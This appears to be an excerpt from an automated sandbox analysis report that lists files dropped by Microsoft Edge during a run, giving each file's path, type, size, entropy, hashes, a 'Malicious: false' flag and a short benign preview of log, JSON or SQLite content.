SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	431
Entropy (8bit):	5.267861322080482
Encrypted:	false
SSDEEP:	6:iOrvRmM+q2PCHhJ23oH+TcwtzjqEKj3K/2jMGIFUtJvRkZmwPvRapMVkwOCHhJ2k:7sM+vBYebvqBQFUtk/KMV56YebvqBvJ
MD5:	D200EB5AF9F881ADAFBD3FC1FBBF3C2C
SHA1:	339F7F3461181FE66C3AAECFF9A92ED53A3527E1
SHA-256:	2FCDDB1C77D7AC33AE464BED6CD2376B7AF5486329EE0D12DC8C804E8AD97805
SHA-512:	25A4ABE2BA0163F85771DEECB8065C0D873633B175FC30730674E6C1AA1FCF4EE64521249053CE1A95A95AAEEBDDAC3A02EA60AD48D44FBF2481AE3590D604C5
Malicious:	false
Preview:	2025/01/09-08:42:28.573 66c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/09-08:42:28.574 66c Recovering log #3.2025/01/09-08:42:28.580 66c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	431
Entropy (8bit):	5.267861322080482
Encrypted:	false
SSDEEP:	6:iOrvRmM+q2PCHhJ23oH+TcwtzjqEKj3K/2jMGIFUtJvRkZmwPvRapMVkwOCHhJ2k:7sM+vBYebvqBQFUtk/KMV56YebvqBvJ
MD5:	D200EB5AF9F881ADAFBD3FC1FBBF3C2C
SHA1:	339F7F3461181FE66C3AAECFF9A92ED53A3527E1
SHA-256:	2FCDDB1C77D7AC33AE464BED6CD2376B7AF5486329EE0D12DC8C804E8AD97805
SHA-512:	25A4ABE2BA0163F85771DEECB8065C0D873633B175FC30730674E6C1AA1FCF4EE64521249053CE1A95A95AAEEBDDAC3A02EA60AD48D44FBF2481AE3590D604C5
Malicious:	false
Preview:	2025/01/09-08:42:28.573 66c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/09-08:42:28.574 66c Recovering log #3.2025/01/09-08:42:28.580 66c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\2e63a0e2-5519-4ddf-b8dc-a6e444b4431d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\7e249f41-01eb-48ec-b0db-7519cbf8e750.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\827e1481-482b-4860-a7f2-3fe67f96a112.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\83b7ad9f-6919-49bd-91ee-a9536ac29d83.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF36fe2.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF37967.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.3886039372934488
Encrypted:	false
SSDEEP:	24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
MD5:	DEA619BA33775B1BAEEC7B32110CB3BD
SHA1:	949B8246021D004B2E772742D34B2FC8863E1AAA
SHA-256:	3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
SHA-512:	7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	3.4921535629071894
Encrypted:	false
SSDEEP:	3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
MD5:	69449520FD9C139C534E2970342C6BD8
SHA1:	230FE369A09DEF748F8CC23AD70FD19ED8D1B885
SHA-256:	3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
SHA-512:	EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	419
Entropy (8bit):	5.267213588646138
Encrypted:	false
SSDEEP:	12:7ObM+vBYebvqBZFUt8F/qypMV56YebvqBaJ:7OhBYebvyg8st6YebvL
MD5:	BB0C89C99DF2187DFD368AFADE079C77
SHA1:	D6171993E5DEE26D9C6D2F1DB0A2CC297E1602D5
SHA-256:	ACF2EB7156F9C7DDE8BAC2BE9E4C5F94A2640F75487E3E8CF6D89E7FF77CD3A6
SHA-512:	26BC426B0661D2041F988F438FCE58D2A6BF804E8876B1B7A1DFAAE06170A9AF020F42D31572861E3AB5C1AD0DA0EAB62132705D59723F184C371036D491A4E2
Malicious:	false
Preview:	2025/01/09-08:42:47.402 66c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/09-08:42:47.403 66c Recovering log #3.2025/01/09-08:42:47.407 66c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	419
Entropy (8bit):	5.267213588646138
Encrypted:	false
SSDEEP:	12:7ObM+vBYebvqBZFUt8F/qypMV56YebvqBaJ:7OhBYebvyg8st6YebvL
MD5:	BB0C89C99DF2187DFD368AFADE079C77
SHA1:	D6171993E5DEE26D9C6D2F1DB0A2CC297E1602D5
SHA-256:	ACF2EB7156F9C7DDE8BAC2BE9E4C5F94A2640F75487E3E8CF6D89E7FF77CD3A6
SHA-512:	26BC426B0661D2041F988F438FCE58D2A6BF804E8876B1B7A1DFAAE06170A9AF020F42D31572861E3AB5C1AD0DA0EAB62132705D59723F184C371036D491A4E2
Malicious:	false
Preview:	2025/01/09-08:42:47.402 66c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/09-08:42:47.403 66c Recovering log #3.2025/01/09-08:42:47.407 66c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.2706959450525215
Encrypted:	false
SSDEEP:	6:iOrvRKC9+q2PCHhJ23oH+TcwtpIFUtJvRKvLNJZmwPvRKM9VkwOCHhJ23oH+Tcwd:71+vBYebmFUt2b/TV56YebaUJ
MD5:	FD7B31FBD65F01177D511B8BCB823F3A
SHA1:	F5320A60EAC8117559E8DD4E0C67622145DC9EAF
SHA-256:	9D5780AB73CB7B9A3E39715BAED6E45CC95E86EFEA69CD7B599AB0E8384C8D61
SHA-512:	7E4B11509EE8DE6FED9510E27DD131426B27AA01437D64DD94CC32FEE92E2F7ADAFC6A0AFF54AFD78DC3D8AE61F9AFBC380E31CB7E607B68D4BA9E0B0997B763
Malicious:	false
Preview:	2025/01/09-08:42:27.744 1d2c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/09-08:42:27.781 1d2c Recovering log #3.2025/01/09-08:42:27.786 1d2c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.2706959450525215
Encrypted:	false
SSDEEP:	6:iOrvRKC9+q2PCHhJ23oH+TcwtpIFUtJvRKvLNJZmwPvRKM9VkwOCHhJ23oH+Tcwd:71+vBYebmFUt2b/TV56YebaUJ
MD5:	FD7B31FBD65F01177D511B8BCB823F3A
SHA1:	F5320A60EAC8117559E8DD4E0C67622145DC9EAF
SHA-256:	9D5780AB73CB7B9A3E39715BAED6E45CC95E86EFEA69CD7B599AB0E8384C8D61
SHA-512:	7E4B11509EE8DE6FED9510E27DD131426B27AA01437D64DD94CC32FEE92E2F7ADAFC6A0AFF54AFD78DC3D8AE61F9AFBC380E31CB7E607B68D4BA9E0B0997B763
Malicious:	false
Preview:	2025/01/09-08:42:27.744 1d2c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/09-08:42:27.781 1d2c Recovering log #3.2025/01/09-08:42:27.786 1d2c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.264747381242274
Encrypted:	false
SSDEEP:	384:KrJ/2qOB1nxCkMdSAELyKOMq+8QTQKC+CVumw:K0q+n0Jd9ELyKOMq+8Q7H
MD5:	16452A0DCD321EA82725CC79F6A16E4D
SHA1:	18171FFBC8E6BD568E5FCEC1B47CC7CF4B758BD6
SHA-256:	BFD9BA75D3907014283014E2E371145808131E8D8DDD5E1860E1EE7F3B621AAA
SHA-512:	B73BB09865690C9A6A6165D013B564C673BAA8ED3F1ADBC32D0FFFCABE563F69543EB133F297999E77375997412BC2D73973B730D2D9D573FCE08C80DB9C3BB9
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.4668303896686487
Encrypted:	false
SSDEEP:	48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0L/Q7d:v7doKsKuKZKlZNmu46yjx0LI7d
MD5:	DF99582C4475ACE3F92950856C878736
SHA1:	09A9C99E59B438AE0C8233115283142A4B9E925A
SHA-256:	40F62CA81EB33B236FA57D69F501C099D853C5B81ADBC535FAE3A2B8FEC6ABBD
SHA-512:	01AB583939727FE5C42D6EE6384E6DA3D67912846B79E9A250EBCAFA8549F1108CB40B7C1BC4A5E5129601BD47967C9DF457F94DCA559CCA7E0C498367528FEF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3951), with CRLF line terminators
Category:	dropped
Size (bytes):	11755
Entropy (8bit):	5.190465908239046
Encrypted:	false
SSDEEP:	192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
MD5:	07301A857C41B5854E6F84CA00B81EA0
SHA1:	7441FC1018508FF4F3DBAA139A21634C08ED979C
SHA-256:	2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
SHA-512:	00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
Malicious:	false
Preview:	{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.3410017321959524
Encrypted:	false
SSDEEP:	12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
MD5:	98643AF1CA5C0FE03CE8C687189CE56B
SHA1:	ECADBA79A364D72354C658FD6EA3D5CF938F686B
SHA-256:	4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
SHA-512:	68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\f135a885-a0d9-406b-a25b-e69a9474c5c9.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\fc42eff2-9cbf-4b6f-9b8e-0b5710b462cf.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	30244
Entropy (8bit):	5.5664882533575755
Encrypted:	false
SSDEEP:	768:7GUWYF7pLGLhuzWPdNfVF8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP32kx5VrwdNpJM:7GUWYTchuzWPdNfVFu1jaO32S5evty
MD5:	211B3D7120B0C58A14EDF0F03612F6B2
SHA1:	95F55AFA4DB80E3E2537F980F77FA505892F39CE
SHA-256:	917F6B8F43D6CE457217E1C5B663843BB5F24F937895CE21C91A66BFEB5B9143
SHA-512:	410BE295D8699DE15B342E30F5AC418FE7E3F678F9FB4CD8B5C89FD7F12D5C998A6DBDAC7D19A5E12DDC7A1A113A830075D83EEC90C226AD3695233DBD7E0336
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380903747659779","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380903747659779","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.10156659858263363
Encrypted:	false
SSDEEP:	12:+wGcwGz5spEjVl/PnnnnnnnnnnnvoQ/Eou:+czaoPnnnnnnnnnnnv1j
MD5:	1D2149B4C090343115155C1D5946FEDF
SHA1:	5F3CEB2CD858F92BF0273E2DC1DF7DCB476EB7B2
SHA-256:	4BA6E6DE7B52441B29D9FA7D1785AAA3102BEA39D5F0D05AB21D5B1629BCAEB3
SHA-512:	CF1B3881EDFF1BCF62C34AFD2E6426E34F8232C629A7EDAFFF5D7DF05EC31EB3F5A9BA31B9426B18F973C617820BFECDEFF9351138CAF2EDA4096C91BC5EA7C8
Malicious:	false
Preview:	..-.............M.........q...J..XE6.:...[.....;..-.............M.........q...J..XE6.:...[.....;........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	317272
Entropy (8bit):	0.8866865786410043
Encrypted:	false
SSDEEP:	384:3RaDXREcTRY5ARjMKRZgsRBTiRxJZRPf6RWOhRCg513r9R5rxQv8lyXyb/yeyaXV:hadEuYUjbZFB0x1PYWKCwvwu
MD5:	053BC28B2F7AB0293EFE8CEC9279D577
SHA1:	6E29A3A0CC09FD2424EEA18BD6239AB94C72CC4C
SHA-256:	3C076AA48D3469447C9A9F0C32FF34C64160716F3D3ECE7A7FFC82E7295EABCF
SHA-512:	50C720CF54FF376E0671D19408175F432C4B6A77594830CC1D9E921548DB4488327C0403ACB7B4CFBD4D574187F693CFFA561DCA69E7FA2AE75F39E4A0527DE1
Malicious:	false
Preview:	7....-...........XE6.:...,\...n..........XE6.:...^.J.~.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	485
Entropy (8bit):	4.031828042640638
Encrypted:	false
SSDEEP:	6:/XntM+dll3sedhO38WrOuuuuuuuuuuQnillNh15/iiYlpnsedhOf:lllc8zWrOuuuuuuuuuuhll1Byps8u
MD5:	DADD297A4EA07147A164D41E3AC296E9
SHA1:	E172D6AA208909155253D9BF0C9358F632D255B6
SHA-256:	E96A71C04A11314094F6F4754653C0719A28997E7F107A9E911D8EEA83282F9E
SHA-512:	C2412BCC82F79781EFFA183C454A3F4C518F6FD54277FDA38C83A24834C311896562998119A2D5F45C593F5B6CA764BACB477B39416E4CAE1EA43BF7A9FD19A8
Malicious:	false
Preview:	A..r.................20_1_1...1.,U.................20_1_1...1....0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=.................a/;...............#38_h.......6.Z..W.F......cK......cK.........V.e................V.e..................."0................39_config..........6.....n ....1

